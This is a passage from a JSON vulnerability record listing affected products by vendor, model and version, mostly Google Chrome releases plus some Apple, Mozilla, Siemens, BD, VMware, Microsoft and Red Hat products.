        "version": "14.0.806.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.13"
      },
      {
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.863.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.652.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.29"
      },
      {
        "model": "simatic ipc227e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.952.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.401.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.495.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1019"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.872.0"
      },
      {
        "model": "simatic hmi comfort pro panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1022.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.153"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.341.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.11"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.223"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1657.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1273.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.46"
      },
      {
        "model": "rowa vmax system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1274.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1303.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1015"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.714.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.8"
      },
      {
        "model": "pyxis parx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.6"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.22"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "4.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.150"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.230"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.67"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.942.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.128"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.720.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.904.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.212"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.116"
      },
      {
        "model": "pyxis nursing data collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1052.0"
      },
      {
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.305.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "data innovations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1034"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.145"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.646.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.697.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.222"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.593.0"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.100"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.339.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.70"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1031.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.626.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.37"
      },
      {
        "model": "facslyric",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.708.0"
      },
      {
        "model": "facscanto 10-color",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "v80"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.559.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.625.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.64"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1009.0"
      },
      {
        "model": "facsduet sample prep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.680.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.326"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.659.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.881.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.800.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37599"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.330.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1001"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1056"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.768.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.82"
      },
      {
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.11"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.1.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.670.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.378.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.0"
      },
      {
        "model": "sinumerik d sl ncu720.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "sinumerik panels wtih integrated tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1037"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.2"
      },
      {
        "model": "pyxis parassist system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.2"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1060"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.300.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.509.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.387.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.27"
